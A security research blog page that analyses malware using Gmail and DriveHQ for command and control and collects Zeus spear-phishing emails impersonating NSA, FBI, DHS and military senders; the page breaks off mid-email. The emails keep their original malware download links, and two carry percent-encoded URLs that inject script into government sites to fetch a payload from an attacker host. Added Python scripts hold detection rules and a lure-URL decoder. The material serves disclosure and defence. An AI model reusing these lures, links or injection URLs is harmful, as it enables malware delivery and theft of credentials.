Posts tagged “Social Engineering”

Command and Control in the Cloud



In “Shadows in the Cloud: An investigation into cyber espionage 2.0” my co-authors and I analyzed the command and control infrastructure of a network that extracted secret, confidential and restricted documents from the Indian government and military. The Shadow Network used a complex and tiered command and control infrastructure that leveraged Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo! Mail in order to maintain persistent control over the compromised computers. As we noted in the report, the use of these services as elements of command and control is certainly not new:

The use of social networking sites as elements of command and control for malware networks is not novel. The attackers leverage the normal operation of these systems in order to maintain control over compromised systems. In 2009, researchers found that Twitter, Jaiku, Tumblr, Google Groups, Google AppEngine and Facebook had all been used as the command and control structure for malware. In August 2009, Arbor Networks’ Jose Nazario found that Twitter was being used as a command and control component for a malware network. In this case, the malware was an information stealer focused on extracting banking credentials from compromised computers located mostly in Brazil. Twitter was not the only channel being used by the attackers. They also used accounts on Jaiku and Tumblr (Nazario 2009a). Furthermore, Arbor Networks found another instance of malware that used the Google AppEngine to deliver malicious URLs to compromised computers (Nazario 2009b). The Unmask Parasites blog found that obfuscated scripts embedded in compromised web sites used the Twitter API to obscure their activities. While the method was clever, the code was unreliable and appeared to have been abandoned by the attackers (Unmask Parasites 2009). Symantec found that Google Groups were being used as command and control for another instance of malware. In this case, a private Google group was used by the attackers to send commands to compromised computers which then uploaded their responses to the same Group (Symantec 2009a). Symantec also found an instance of malware that used Facebook status messages as a mechanism of command and control (Symantec 2009b). The use of these social networking and Web 2.0 tools allows the attackers to leverage the normal operation of these tools to obscure the command and control functions of malware.

Earlier this year, Sunbelt found a Twitter botnet creator, and Trend Micro reports that the “Here You Have” worm used GMail accounts. As we found with the Shadow Network, malware authors learn from each other. And in the case of the Shadow Network they didn’t just use one service; they used six of them, including Yahoo! Mail. And while indiscriminate malware may be rather noisy, the malware used in targeted attacks tends to be (but is certainly not always) more discreet.

A recent sample posted at contagiodump.blogspot.com caught my attention for this very reason. The sample, “Conference Information_2010 IFANS Conference on Global Affairs (1001).pdf” (which was sent from 221.9.247.17 and was detected by 14 /43 (32.6%) AV products at Virustotal) arrived with the subject line “Nuclear Challenges and Responses in the Century” and exploited a vulnerability in Adobe Reader/Acrobat (CVE-2010-2883) to drop malware on the targets’ computers. For those of you who follow Mila’s awesome blog, this scenario is hardly surprising.

But a few things caught my attention. The strings dumped from a file the malware created (syschk.ocx) referenced GMail (mail.google.com) and DriveHQ (drivehq.com), which describes itself as a “cloud based storage, backup, group sharing and collaboration service.” When you look at the traffic generated by the malware you’ll see connections to these locations.

There is nothing about these locations that is very suspicious — everyone checks their GMail right? Moreover, the connection to GMail is SSL encrypted.

Using Burp (which made the process very simple) I MITM’d the traffic between the malware and GMail. The malware logs in to the GMail account and sends an email to another GMail address. The content of this email is encrypted. However, I believe that what it is sending — although this is just a hunch — is the content of another file the malware generates: form.ocx. This file contains what appears to be a unique ID assigned by the malware, the hostname and IP address, the default home page of the default browser and a listing of installed programs on the computer. The end of the file contains information about executables the malware has impacted. The unique ID from form.ocx also appears at the beginning of the encrypted message sent through the GMail account.

IEXPLORE.EXE done
CHROME.EXE done
FIREFOX.EXE done

C:\WINDOWS\system32\form.ocx
Infect OK!

I have not looked into what exactly the malware does to these applications, but it basically disables Firefox and Chrome and instead connects to the Gmail account when you try to start them. Internet Explorer seems to function normally.

The connection to fuechei.chang.drivehq.com results in the download of an additional file, rename.ocx, whose strings appear very similar to those of syschk.ocx. It then renames syschk.ocx to syschk.ocx1. This correlates with text in the strings dumped from syschk.ocx:

%s\rename.ocx

http://%s/rename

%s\syschk.ocx1

After the initial connections to GMail and DriveHQ the malware went quiet. I never did get it to connect again.

As network defenses continue to include traffic analysis, I believe that we will continue to see a move toward using popular services, especially web mail, as command and control elements. Unlike connections to well-known dynamic DNS services like 3322.org or abnormal connections to geographic regions, connections to GMail and other popular services do not necessarily stand out. Moreover, the connections to services such as GMail are encrypted, further obscuring the malicious activity that is occurring.
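Since the destination alone looks benign, one place detection can still get purchase is the process context around the connection and the file drops that precede it. The script below is an added example, not code from the original post; the telemetry records and the rundll32.exe loader are constructed, Sysmon-style samples rather than observations from the sample, and it does not cover the hijacked-browser case described above (Firefox or Chrome itself making the Gmail connection), which needs baselining of timing and volume instead.

```python
"""Flag webmail/cloud-storage connections by process context rather than by
destination.  Added example, not code from the original post; the event format
is a simplified Sysmon-like record constructed for illustration."""
from dataclasses import dataclass
from typing import List, Tuple

# Hosts contacted by the sample discussed above; extend with other webmail
# and storage providers in a real deployment.
WEBMAIL_AND_STORAGE = {"mail.google.com", "drivehq.com"}
# Processes for which traffic to those hosts is ordinary user activity.
BROWSERS_AND_MAIL = {"iexplore.exe", "firefox.exe", "chrome.exe", "outlook.exe"}
# Document readers that should never write into the Windows system directory;
# the sample arrived as a PDF exploiting Adobe Reader.
DOCUMENT_READERS = {"acrord32.exe", "winword.exe", "excel.exe"}


@dataclass
class Event:
    kind: str     # "net" (outbound connection) or "file" (file created)
    process: str  # image name of the process
    target: str   # destination host for "net", file path for "file"


def host_matches(host: str, suspects: set) -> bool:
    """True if host equals or is a subdomain of any suspect domain
    (fuechei.chang.drivehq.com matches drivehq.com)."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in suspects)


def evaluate(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (rule, process, target) alerts for events that match a rule."""
    alerts = []
    for ev in events:
        proc = ev.process.lower()
        # Rule 1: a process that is not a browser or mail client talking to
        # webmail or cloud storage.
        if ev.kind == "net" and host_matches(ev.target, WEBMAIL_AND_STORAGE) \
                and proc not in BROWSERS_AND_MAIL:
            alerts.append(("non_browser_to_webmail", proc, ev.target))
        # Rule 2: a document reader dropping a file into system32.
        if ev.kind == "file" and proc in DOCUMENT_READERS \
                and "\\system32\\" in ev.target.lower():
            alerts.append(("reader_writes_system32", proc, ev.target))
    return alerts


# Constructed sample telemetry: the PDF reader drops syschk.ocx, a browser makes
# an ordinary Gmail connection, and a hypothetical loader (rundll32.exe, not
# identified in the post) beacons to the two hosts noted above.
SAMPLE_EVENTS = [
    Event("file", "AcroRd32.exe", r"C:\WINDOWS\system32\syschk.ocx"),
    Event("net", "iexplore.exe", "mail.google.com"),
    Event("net", "rundll32.exe", "mail.google.com"),
    Event("net", "rundll32.exe", "fuechei.chang.drivehq.com"),
    Event("file", "msiexec.exe", r"C:\WINDOWS\system32\msvcr80.dll"),
]

if __name__ == "__main__":
    for rule, proc, target in evaluate(SAMPLE_EVENTS):
        print(f"{rule}: {proc} -> {target}")
```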

Crime or Espionage? Part 2



In “Crime or Espionage Part 1” I examined a series of attacks that appear to be aimed at those interested in intelligence issues and those in the government and military. The malware used in these attacks was ZeuS and there are common command and control elements used in the attacks beginning in December 2009 and continuing until late August 2010. In addition, these attacks have been linked to infrastructure used by the Kneber botnet, a ZeuS-based botnet discovered by Netwitness.

This post is an overview of a collection of publicly available emails associated with this ongoing series of attacks. These are the socially engineered emails designed to lure potential victims into clicking on and executing the attackers’ malicious code. While the attacks are not targeted down to the individual, or even institutional, level, and appear to have been sent to a wide variety of targets, the content of the emails is geared towards those interested in intelligence, military and security issues.

The malicious emails appear to have been sent from email addresses associated with the following domain names: nsa.gov, greylogic.us, pentagon.af.mil, fbi.gov, dia.mil, dhs.gov, stratcom.mil and ifc.nato.int. With the exception of Jeff Carr’s Grey Logic, the emails appear to come from government and military sources. The subject lines and the text of the emails largely focus on security issues, with some messages making use of classification markings such as “U//FOUO” and official-looking email footers in order to appear legitimate.

The links to the malicious files contained within the emails make use of a variety of hosts. The attackers often include a link to the file sharing services rapidshare.com, sendspace.com and depositfiles.com. They also use compromised legitimate websites, many of which run the Joomla! CMS. At other times the attackers have used domain names registered specifically for malicious purposes:

dnicenter.com – abuseemaildhcp@gmail.com
dhsorg.org – hilarykneber@yahoo.com

The email addresses abuseemaildhcp@gmail.com and hilarykneber@yahoo.com are well known and have been used to register numerous domain names associated with malware, mostly ZeuS.

The “hilarykneber@yahoo.com” email address was made famous by the discovery of the Kneber botnet by Netwitness. Netwitness revealed that many of the compromised computers in the US included government networks as well as Fortune 500 enterprises. This is not entirely surprising, as any large botnet is likely to have compromised some government computers. But the recognition of this fact may be the catalyst for the series of attacks using intelligence, military and security themes as lures. Not all compromised computers are of the same value, and surely the attackers realize this. In “Conversations With a Blackhat” RSnake outlines this scenario:

There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million machine botnet having compromised at least one machine within a target of interest is relatively high.

So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.

A variation of this is a scenario in which the botmaster grows the botnet through means that increase the chances of compromising a target of interest that “badguy1” wants to compromise. By using intelligence, military and security issues and themes in the lure emails, perhaps the attackers are aiming to increase the likelihood of compromising a sensitive location. In such a scenario, the botmaster is happy to get some new bots connecting to the Zeus command and control server (from which credentials and other information can be extracted) and can also sell any sensitive data that has been stolen or sell access to any sensitive compromised computer.

The emails below are a collection of publicly available emails associated with an ongoing series of attacks using Zeus.

December 9, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://contagiodump.blogspot.com/2009/12/creative-nsa-spoof-attack-of-day.html

From: ecu@nsa.gov
Date: December 9, 2009 4:33:51 PM GMT+05:00
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS

AFRL-RI-RS-TR-2009-136
Final Technical Report
December 2009

CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)

INFORMATION SUBJECT TO EXPORT CONTROL LAWS

WARNING – This document contains technical data whose export is restricted by the Arms Export Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended (Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal penalties. Disseminate IAW DoDD 5230.25.

DESTRUCTION NOTICE – For classified documents, follow the procedures in DOD 5220.22-M, National Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program, Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of contents or reconstruction of the document.

Export of the attached information (which includes, in some circumstances, release to foreign nationals within the United States) without first obtaining approval or license from the Department of State for items controlled by the International Traffic in ArmsRegulation (ITAR), or the Department of Commerce for items controlled by the Export Administration Regulation (EAR), may constitute a violation of law.

Download:

http://www.zeropaid.com/bbs/includes/CYBERCAFE.zip

or

http://rapidshare.com/files/318309046/CYBERCAFE.zip.html

http://www.sendspace.com/file/fmbt01

December 14, 2009
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://groups.yahoo.co.jp/group/boxing-fun/message/20326?threaded=1&viscount=14&expand=1

From: uctd@nsa.gov
Date: December 14, 2009 1:56:24 PM GMT+05:00
Subject: Information Systems Security Reminder

Information Systems Security Reminder

— Users are reminded to be aware and vigilant when using government information services both inside and outside protected environments.

— Be aware of your surroundings when accessing these services remotely, and prefer trusted workstations. Evaluate the security risks inherent with use of public workstations, including “shoulder surfing” by nearby persons.

— When communicating via email, know with whom you are communicating. Common adversary techniques include social engineering, email phishing, and evocative attachments. Government system capabilities may only be discussed with authorized personnel.

— If you make an error (e.g., data spill), report it so that the problem can be addressed. Report any anomalies you observe to your security office or service desk.

Security Software:

http://hkcaregroup.com/modlogan/MILSOFT.zip

or

http://rapidshare.com/files/320369638/MILSOFT.zip.html

http://fcpra.org/downloads/MILSOFT.zip

February 10, 2010
Source: http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/

From: jeffreyc@greylogic.us
Date: Wednesday, February 10, 2010 7:34 AM
Subject: Russian spear phishing attack against .mil and .gov employees

Russian spear phishing attack against .mil and .gov employees

A “relatively large” number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or InteLink concerning a report by the National Intelligence Council named the “2020 Project”. It’s purpose is to collect passwords and obtain remote access to the infected hosts.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft(r) Windows(r) and gain complete control over it. You can help protect your
computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://fcpra.org/downloads/winupdate.zip

or

http://www.sendspace.com/file/tj373l

___________
Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal
Investigator of Project Grey Goose, and the author of “Inside Cyber Warfare”.
jeffreyc@greylogic.us

February 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg12517.html

From: jeffreyc@nsa.gov
Date: February 11, 2010 9:39:15 AM GMT+05:00
Subject: RE: Zeus Attack Spoofs NSA, Targets .gov and .mil

Zeus Attack Spoofs NSA, Targets .gov and .mil

Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.

According one state government security expert who received multiple copies of the message, the e-mail campaign — apparently designed to steal passwords from infected systems — was sent exclusively to government (.gov) and military (.mil) e-mail addresses.

The messages are spoofed so that they appear to have been sent by the National Intelligence Council (address used was nic@nsa.gov), which serves as the center for midterm and long-range strategic thinking for the U.S. intelligence community and reports to the office of the Director of National Intelligence.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft® Windows® and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://mv.net.md/update/update.zip

or

http://www.sendspace.com/file/7jmxtq

February 12, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/dod-roles-and-missions-in-homeland-security

From: apacs@pentagon.af.mil
Date: 12 Feb 2010 20:41:01 (GMT)
Subject: DoD Roles and Missions in Homeland Security

Defense Science Board

DoD Roles and Missions in Homeland Security

VOLUME II – A: SUPPORTING REPORTS

This report is a product of the Defense Science Board (DSB). The DSB is a Federal Advisory Committee established to provide independent advice to the Secretary of Defense. Statements, opinions, conclusions and recommendations in this report do not necessarily represent the official position of the Department of Defense.

Download:

http://mv.net.md/dsb/DSB.zip

or

http://www.sendspace.com/file/rdxgzd

___________
Office of the Under Secretary of Defense
For Acquisition, Technology, and Logistics
Washington, D.C. 20301-3140

February 21, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://osdir.com/ml/general/2010-02/msg25834.html

From: cttd@fbi.gov
Date: February 21, 2010 7:37:16 AM GMT+05:00
Subject: INTELLIGENCE BULLETIN

FEDERAL BUREAU OF INVESTIGATION
INTELLIGENCE BULLETIN

February 2010

Weapons of Mass Destruction Directorate

Indicators for Terrorist Use of Toxic Industrial Chemicals

THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.

UNCLASSIFIED//FOR OFFICIAL USE ONLY

Download:

http://timingsolution.com/Doc/BULLETIN.zip

or

http://www.sendspace.com/file/goz3yd

___________
HANDLING NOTICE: Recipients are reminded that FBI Intelligence Bulletins contain sensitive terrorism and counterterrorism information meant for use primarily within the law enforcement and homeland security communities. Such bulletins shall not be released, either in written or oral form, to the media, the general public, or other personnel who do not have a valid need-to-know without prior approval from an authorized FBI official, as such release could jeopardize national security.

March 6, 2010
Source: http://aquiacreek.com/showthread.php?1712-URGENT!-Phising-Email-Scam

Office of the Director of National Intelligence INTELLIGENCE BULLETIN UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 7.12 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=%3c%61%20%68%72%65%66%3d%22%6 8%74%74%70%3a%2f%2f%64%6e%69%63%65%6e%74%65%72%2e% 63%6f%6d%2f%64%6f%63%73%2f%72%65%70%6f%72%74%2e%7a %69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3 e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f% 70%65%6e%28%27%68%74%74%70%3a%2f%2f%64%6e%69%63%65 %6e%74%65%72%2e%63%6f%6d%2f%64%6f%63%73%2f%72%65%7 0%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70% 74%3e

________________
Office of the Director of National Intelligence Washington, D.C. 20511

* The actual URL is: http://dnicenter.com/docs/report.zip

March 7, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/for-official-use-only—dprk-missile-attack-on-japan
Source: http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email

From: SSC@dia.mil
Date: 7 Mar 2010 14:17:51 (GMT)
Subject: FOR OFFICIAL USE ONLY

Office of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US seismographic stations recorded seismic activity in the area of Okinawa Island (Japan). According to National Geospatial-Intelligence Agency, Democratic People’s Republic of Korea has carried out an average range missile attack with use of nuclear warhead. The explosion caused severe destructions in the northern part of the Okinawa island. Casualties among the personnel of the US military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the personnel of the services listed below to be ready for immediate mobilization:

CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE

DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH

DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS

DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://www.mod.gov.ge/2007/video/movie.php?l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70%74%3e%3c%22

________________
Office of the Director of National Intelligence
Washington, D.C. 20511

* The actual URL is: http://officialweightlosshelp.org/wp-admin/report.zip
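Both lure URLs footnoted above (the March 6 and March 7 emails) hide the real download inside a percent-encoded query parameter on a legitimate government host. The function below, an added example rather than code from the post, decodes such a URL the way a mail gateway or analyst script could and flags a parameter that carries HTML or script markup linking to a third-party archive. The two URLs are copied from the emails as they appear above, including the line-wrap spaces in the first one, which the code strips before decoding.

```python
"""Decode lure URLs whose query string smuggles HTML/script pointing at a
third-party archive.  Added example, not code from the original post."""
import re
from urllib.parse import urlsplit, parse_qsl

# Markup that a search or video-player parameter has no business containing.
MARKUP_RE = re.compile(r"<\s*/?\s*(a|script|iframe|img|object|embed)\b|javascript:", re.I)
URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.I)
ARCHIVE_RE = re.compile(r"\.(zip|rar|exe|scr)$", re.I)


def normalize(url: str) -> str:
    """Strip whitespace that mail clients and forum quoting insert into long URLs."""
    return re.sub(r"\s+", "", url)


def analyze_lure_url(url: str) -> dict:
    """Percent-decode every query value and report smuggled markup and any
    URL inside it that points somewhere other than the outer host."""
    url = normalize(url)
    parts = urlsplit(url)
    outer_host = (parts.hostname or "").lower()
    result = {"host": outer_host, "injected_markup": False,
              "third_party_urls": [], "archive_download": False}
    # parse_qsl percent-decodes each value, exposing the hidden HTML.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        if MARKUP_RE.search(value):
            result["injected_markup"] = True
        for embedded in URL_RE.findall(value):
            inner = urlsplit(embedded)
            inner_host = (inner.hostname or "").lower()
            if inner_host and inner_host != outer_host \
                    and embedded not in result["third_party_urls"]:
                result["third_party_urls"].append(embedded)
            if ARCHIVE_RE.search(inner.path):
                result["archive_download"] = True
    result["suspicious"] = result["injected_markup"] and bool(result["third_party_urls"])
    return result


# The two lure URLs quoted in the ODNI/DIA emails above (the first with the
# line-wrap spaces it carries on the page).
GPO_LURE = (
    "http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=%3c%61%20%68%72%65%66%3d%22%6 "
    "8%74%74%70%3a%2f%2f%64%6e%69%63%65%6e%74%65%72%2e% "
    "63%6f%6d%2f%64%6f%63%73%2f%72%65%70%6f%72%74%2e%7a "
    "%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f%61%3 "
    "e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f% "
    "70%65%6e%28%27%68%74%74%70%3a%2f%2f%64%6e%69%63%65 "
    "%6e%74%65%72%2e%63%6f%6d%2f%64%6f%63%73%2f%72%65%7 "
    "0%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70% "
    "74%3e"
)
MOD_GE_LURE = (
    "http://www.mod.gov.ge/2007/video/movie.php?l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70"
    "%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77"
    "%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c%2f"
    "%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74%74%70%3a%2f%2f%6f"
    "%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64"
    "%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27%29%3c%2f%73%63%72%69%70%74%3e%3c%22"
)

if __name__ == "__main__":
    for lure in (GPO_LURE, MOD_GE_LURE):
        print(analyze_lure_url(lure))
```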

March 11, 2010
Source: http://cafe.comebackalive.com/viewtopic.php?f=1&t=48812&start=0
Source: http://dl.ambiweb.de/mirrors/www.tldp.org/LDP/LGNET/173/lg_launderette.html

From: hsi@dhs.gov
Date: March 11, 2010 11:38:56 PM GMT+05:00
Subject: U.S. Department of Homeland Security

Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

11 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://dhsorg.org/docs/instructions.zip

________________
U.S. Department of Homeland Security
Washington, DC 20528

March 13, 2010
Source: http://www.blackfortressindustries.com/malware-analysis/e-mail-with-phishing-links/re-instructions-unclassified

From: NSI@dhs.gov
Date: 13 Mar 2010 18:26:54 (GMT)
Subject: RE: Instructions UNCLASSIFIED

U.S. Department of Homeland Security
INTELLIGENCE BULLETIN
UNCLASSIFIED

13 March 2010

Yesterday the Department of Homeland Security has received the prevention from NASA’s Jet Propulsion Laboratory about the occurred shift of Earth’s figure axis:
______________________

The recent Chilean earthquake shifted the axis by approximately three inches and shortened the length of a day by 1.26 microseconds. According to NASA’s Jet Propulsion Laboratory the displacement of Earth’s axis will cause natural disasters on the Eastern coast of the USA including Florida, Georgia, South and North Carolina.
______________________

In this connection the DHS has made a decision to prepare for general evacuation from the specified area. The population of the region should be ready for evacuation. It is necessary collect valuable possessions, documents, things of first necessity, and wait for the announcement.

In order to prevent panic among the population DHS asks to stay calm and follow the official instructions listed below:

http://www.sendspace.com/file/h96uh1

or

http://depositfiles.com/files/xj1wvamc4

________________________________________
U.S. Department of Homeland Security
Washington, DC 20528

June 16, 2010
Source: http://www.clearancejobs.com/security_tips.php

From: rss@stratcom.mil
Date: Wed Jun 16 13:10:08 2010
Subject: From STRATCOM to

,

United States Strategic Command

Commanders Reading List

Professional development is essential to the successful execution of our mission – to provide global security for America. One key component to professional development is reading and critically thinking about military issues, history, and leadership. I am pleased to announce the following selections for my 2010 Commander’s Professional Reading List. It is my intent that this list will serve as a guide for all STRATCOM military and civilian personnel to enhance their professional knowledge.

All of the titles below are available immediately for check-out at the Thomas S. Power Library on base and in the USSTRATCOM Leadership Institute.

Our overarching objective is to provide global security to our nation-the best in the world. I encourage everyone to read these titles and continue your professional development so you can continue to be the finest operators, planners, and advocates for STRATCOM and its global mission set.

KEVIN P. CHILTON
General, USAF
Commander

Inside Cyber Warfare: Mapping the Cyber Underworld (Dec 2009)

This book provides fascinating and disturbing details on how nations, groups, and individuals throughout the world are using the Internet as an attack platform to gain military, political, and economic advantages over their adversaries. Discusses how sophisticated hackers, working on behalf of states or organized crime, patiently play a high-stakes game targeting anyone, regardless of affiliation or nationality. (Amazon.com)

Author: Jeffrey Carr is a cyber intelligence expert, columnist for Symantec’s Security Focus, and author who specializes in the investigation of cyber attacks against governments and infrastructures by State and Non-State hackers. Mr. Carr is the Principal Investigator for Project Grey Goose, an Open Source intelligence investigation into the Russian cyber attacks on Georgia in August, 2008. His work has been quoted in The New York Times, The Washington Post, The Guardian, BusinessWeek, Parameters, and Wired.

Additional information can be found in the following report:

http://tiesiog.puikiai.lt/report.zip

http://somashop.lv/report.zip

________________________________________
To report a problem please submit an ODNI/ICES Ticket
Phone: 301-688-1800 (commercial), 644-1800 (DSN), 363-6105 (NSTS)”

June 17, 2010
Source: http://kerneltrap.org/mailarchive/openbsd-bugs/2010/6/17/6884952
Source: http://www.mail-archive.com/ports@openbsd.org/msg28673.html

From: izhar.mujaddid@pentagon.af.mil
Date: Thursday, June 17, 2010 – 11:57 am
Subject: Scientific Advisory Board

UNCLASSIFIED//FOR OFFICIAL USE ONLY

United States Air Force

Scientific Advisory Board

Report on Defending and Operating in a Contested Cyber Domain

Executive Summary and Annotated Brief
SAB-TR-10-01
June 2010

This report is a product of the United States Air Force Scientific Advisory
Board Study Committee on Defending and Operating in a Contested Cyber
Domain. Statements, opinions, findings, recommendations and conclusions
contained in this report are those of the Study Committee and do not
necessarily represent the official position of the United States Air Force or the United States Department of Defense.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
HQ USAF/SB
1180 AF PENTAGON RM 5D982
WASHINGTON, DC 20330-1180

June 17, 2010
Source: http://permalink.gmane.org/gmane.linux.debian.qa-packages/33936

From: tsa@dhs.gov
Date: 2010-06-17 18:01:16 GMT
Subject: (U) Transportation Security Administration

UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U) Transportation Security Administration

